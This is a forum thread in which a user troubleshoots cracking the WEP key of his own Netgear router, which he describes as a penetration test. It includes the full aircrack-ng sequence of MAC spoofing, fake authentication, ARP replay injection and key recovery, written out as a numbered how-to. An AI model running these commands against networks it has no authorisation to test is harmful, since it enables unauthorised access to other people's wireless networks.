Page 1 of 2 12 LastLast
Results 1 to 10 of 11

Thread: My WEP not so insecure?

  1. #1
    Member squishyalt's Avatar
    Join Date
    Feb 2010
    Posts
    172

    Default My WEP not so insecure?

    Looking at the videos online and such, I was starting to believe the hype that WEP can be cracked in under 3 minutes.

    Well, mine can't -- unless I'm really screwing something up.

    I have a Netgear WNR864M router with WEP/128 bit, Automatic Authentication Type (I guess it chooses automatically between shared key and open system since they are the 2 other options in the drop down). The key in the router is actually B4582CDB412BD1BB00849F4A57.

    I have collected 145,129 IVs so far - and nothing is coming out of aircrack-ng. I am using Aircrack-ng 1.0 beta r857 and a Hawking USB wireless device with the RT73 chipset.

    I have noticed that there is a significant slow down in gathering IVs (as compared to just starting up. Router is 3 feet from rausb0 and other PC surfing via WEP connection is about 3 feet away.

    Is there a difference in WEPs that make some hackable in 3 minutes whereas mine is still hanging in after after 30+ minutes?

    I have another PC connected wirelessly via my router to generate some traffic and I am listening to streaming radio and surfing on that PC - to help generate some traffic.

    Did I misunderstand all of those videos about hacking WEP in 10, 5 or even 3 minutes?

    To be perfectly clear, this is what I did......

    Code:
    airmon-ng stop rausb0  (success)
    macchanger --mac 00:11:22:33:44:55 rausb0  (success)
    airmon-ng start rausb0  (rausb0 reports in monitor mode)
    airodump-ng rausb0  (begins sucessfully)
    (ctrl-c to stop it and get the BSSID)
    airdump-ng -c 9 -w squishytest --bssid 00:14:6CDE:D1:A8 rausb0 (success)
    aireplay-ng -1 0 -a 00:14:6CDE:D1:A8 -h 00:11:22:33:44:55 rausb0 (success)
    aireplay-ng -3 b 00:14:6CDE:D1:A8 -h 00:11:22:33:44:55 rausb0  (success)
    aircrack-ng -a 1 -b 00:11:22:33:44:55 squishytest-01.cap  (success)
    And.....now here I sit......30+ minutes......and no penetration of the WEP router.

    Am I screwing something up? Are there newer versions of Air* that I should be using? Is there a new driver that would work faster for my RT73 chipset? And, and how could I tell what driver/software versions I even have?

    Thanks for helping me crawl.....

  2. #2
    Senior Member
    Join Date
    Apr 2008
    Posts
    2,008

    Default

    aircrack-ng -a 1 -b 00:11:22:33:44:55 squishytest-01.cap
    Try this command instead.
    Code:
    aircrack-ng -n 128 squishytest*.cap
    The asterisk is just used in case you have more than one cap file and wish to use them all.

    Is there a difference in WEPs that make some hackable in 3 minutes whereas mine is still hanging in after after 30+ minutes?
    The only difference in WEP encryption that will affect the time it takes to crack the key is its actual length. As you are only using a 128 bit key you should easily be able to crack it in a few minutes. You will also want to make sure that you have gathered a substantial amount of weak IVs before you actually try to crack the key.

    aireplay-ng -3 b 00:14:6C: DE: D1:A8 -h 00:11:22:33:44:55 rausb0 (success)
    I take it that you mean that you are able to inject packets and can see the amount of data packets in airodump-ng building up rapidly?
    -Monkeys are like nature's humans.

  3. #3
    Junior Member
    Join Date
    Mar 2007
    Posts
    54

    Default

    I tested against my own network the other day and I got through quite fast.

    I believe it was at around 40k IV's but i could be wrong ...

    If your new to WEP cracking like myself I found it was useful to experiment with VirtuelShamans WEP spoon feeder from hxxp://shamanvirtuel.googlepages.com

  4. #4
    Member squishyalt's Avatar
    Join Date
    Feb 2010
    Posts
    172

    Default

    Whoo Hooooo! I think I got it!

    Remember when I said that I typed

    Code:
    aireplay-ng -3 b 00:14:6C: DE: D1:A8 -h 00:11:22:33:44:55 rausb0 (success)
    Well, I replaced my faked SSID in the above code with the BSSID of my target and cracked it in just "[00:00:00] Tested 757 keys (got 95726 IVs)" using a completely new IV file. It took less than 3 minutes to gather the data.

    I don't know where I got the idea to use my faked MAC.

    Now, I need to look up how to actually connect to the WEP network and run metasploit and some other testing tools.

    Thanks for the help =Tron= and Pureline!

  5. #5
    Junior Member
    Join Date
    Mar 2007
    Posts
    54

    Default

    Glad to be of service mate,

    You want to learn to use Autoscan and Nmap (and alike tools) for gathering information on live hosts next.

  6. #6
    Member squishyalt's Avatar
    Join Date
    Feb 2010
    Posts
    172

    Default

    Quote Originally Posted by Pureline View Post
    Glad to be of service mate,

    You want to learn to use Autoscan and Nmap (and alike tools) for gathering information on live hosts next.
    I spoke too soon. I am unable to replicate the successful penetration test.

    I have been working on this for 3 days with no luck.

    Code:
    How to test a WEP network for key vulnerability....
    
    Get the key for the WEP network.....
     0: Find your wireless device....
     	USAGE -- iwconfig MY_WIRELESS_DEVICE
     	EXAMPLE OF DEVICE NAMES -- rausb0 OR ath0
            EXAMPLE -- iwconfig rausb0
     	
     1: Stop your wireless device to allow MAC address change.
        USAGE -- airmon-ng stop MY_WIRELESS_DEVICE
        EXAMPLE -- airmon-ng stop rausb0
     
     2: Set a fake MAC address for your wireless device (use something easy to remember like 00:11:22:33:44:55)
        USAGE -- macchanger --mac FAKE_MAC_ADDRESS MY_WIRELESS_DEVICE
        EXAMPLE -- macchanger --mac 00:11:22:33:44:55 rausb0
      
     3: Re-start your wireless device in monitor mode - check with iwconfig - run second time if needed
        USAGE -- airmon-ng start MY_WIRELESS_DEVICE
        EXAMPLE -- airmon-ng start rausb0
      
     6: Start airodump-ng to find the network (BSSID, channel and encryption protocol) that you want to test.
        UASAGE -- airodump-ng MY_WIRELESS_DEVICE
        EXAMPLE -- airodump-ng rausb0
        
     7: Stop airodump and copy the target network's BSSID
        USAGE -- {ctrl-c stops airodump-ng then highlight, right click and click copy on the data}
        EXAMPLE OF BSSID TO COPY -- 00:14:6C:DE:D1:A8
     
     8: Save your IV data to a file.  This data is used to figure out the WEP key.
        USAGE  -- airodump-ng -c TARGET_CHANNEL_# -w NEW_DATA_FILENAME --bssid TARGET_BSSID WIRELESS_DEVICE  
        EXAMPLE -- airodump-ng -c 9 -w testingwep --bssid 00:14:6C:DE:D1:A8 rausb0  
        
     9: In seperate shell window - fake authentication on the target network.
        USAGE -- aireplay-ng -1 0 -a TARGET_BSSID -h MY_FAKED_MAC_ADDRESS 
        EXAMPLE -- aireplay-ng -1 0 -a 00:14:6C:DE:D1:A8 -h 00:11:22:33:44:55 
            
    10: Make ARP requests to target to generate traffic.
        USAGE -- aireplay-ng -3 -b TARGET_BSSID -h MY_FAKED_MAC_ADDRESS rausb0
        EXAMPLE -- aireplay-ng -3 -b 00:14:6C:DE:D1:A8 -h 00:11:22:33:44:55 rausb0
        
    11: In seperate shell window - crack the WEP key (your data filename from step 8 will have a # and ".cap added to it's end).
        USAGE -- aircrack-ng -a 1 -b TARGET_BSSID NEW_DATA_FILENAME
        EXAMPLE -- aircrack-ng -a 1 -b 00:14:6C:DE:D1:A8 testingwep-01.cap
        -- Look for "KEY FOUND! [ WEP_KEY ]" in the output.  
        -- EXAMPLE OUTPUT : "KEY FOUND! [ B4:58:2C:DB:41:2B:D1:BB:00:84:9F:4A:57 ]"
    I just can't get a WEP key before something like 1.5 million IVs.

    Are there updates to the BT3 beta that I should be installing?


    See anything I'm screwing up?

  7. #7
    Member squishyalt's Avatar
    Join Date
    Feb 2010
    Posts
    172

    Default

    According to the guys at aircrack-ng, I may have uncovered some flaws in aricrack-ng.

    They need a couple of days to look things over.

    I will post here when I hear something.

  8. #8
    Member squishyalt's Avatar
    Join Date
    Feb 2010
    Posts
    172

    Default

    I have downloaded the aircrack virtual machine and tried using their Aircrack-ng 1.0 rc1 1083 code and it presents the same problem.

    So, I know it is not command, BT3 or update related. It is almost definitely an issue with aircrack-ng.

    I'll keep you updated.

  9. #9
    Junior Member
    Join Date
    May 2006
    Posts
    28

    Default

    use BT 3 FInal...

    start airodump-ng to get the channel and mac of the router.

    then start spoonwep in the console type spoonwep

    paste the mac of the router in the first box, leave teh second box empty..

    choose your adapter and then choose the last option

    ususally works pretty quickly...

  10. #10
    Senior Member
    Join Date
    Apr 2008
    Posts
    2,008

    Default

    Quote Originally Posted by BlayzeX View Post
    use BT 3 FInal...

    start airodump-ng to get the channel and mac of the router.

    then start spoonwep in the console type spoonwep

    paste the mac of the router in the first box, leave teh second box empty..

    choose your adapter and then choose the last option

    ususally works pretty quickly...
    SpoonWEP is only a GUI for aircrack-ng and as squishyalt already seems to be using the correct commands and states that it might be a bug in the program, changing to SpoonWEP should make no difference.

    It would nevertheless be nice to know if the aircrack guys ever did find a problem with the program or if the issue was related to something else, as squishyalt's last post is almost a month old now.
    -Monkeys are like nature's humans.

Page 1 of 2 12 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •